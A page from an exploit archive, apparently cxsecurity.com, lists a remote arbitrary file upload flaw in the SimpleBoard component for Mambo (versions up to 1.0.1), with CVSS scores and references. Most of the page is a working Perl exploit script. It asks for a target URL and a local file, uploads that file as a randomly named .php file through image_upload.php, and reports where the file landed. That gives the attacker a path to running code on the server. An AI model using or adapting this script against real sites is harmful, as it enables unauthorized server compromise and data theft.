Mambo Component SimpleBoard <= 1.0.1 Arbitrary File Upload Exploit

2009.05.29
Credit: t0pP8uZz
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-20


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand(99999) . ".php"; # no int() print <<INTRO; - SimpleBoard Mambo Component <= 1.0.1 - - Remote Arbitrary File Upload Exploit - Discovered && Coded by: t0pP8uZz Discovered on: 20 October 2008 Vendor has not been notified! Note: This exploit is a completely diffrent method then the prior simpleboard vulns. which differs from the one Same files vulnerable, But this one works with the patch! in later versions of SimpleBoard they removed the image_upload.php so this wont work. but this works on every image_upload.php version. with the patch in place! A common error for the exploit is if openbase_dir is enabled, then this means the file will not get uploaded due to the dir restrictions. - Peace - irc.rizon.net #sectalk INTRO print "\nEnter URL(ie: http://site.com/mambo): "; chomp(my $url=<STDIN>); print "\nEnter File Path(path to local file to upload): "; chomp(my $file=<STDIN>); my $ua = LWP::UserAgent->new; my $re = $ua->request(POST $url.'/components/com_simpleboard/image_upload.php', Content_Type => 'form-data', Content => [ attachimage => [ $file, $fname, Content_Type => 'image/jpeg' ], ] ); die "HTTP POST Failed!" unless $re->is_success; if($re->content =~ /open_basedir/) { print "open_basedir restriction enabled. Exploit failed. See php.ini for more details.\n"; # say() ? get perl510 } else { print "Looks like exploit was successfull! for uploaded file check: " . $url . "/components/com_simpleboard/" . $fname . "\n"; } exit;

References:

http://xforce.iss.net/xforce/xfdb/46223
http://www.securityfocus.com/bid/31981
http://www.milw0rm.com/exploits/6868


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top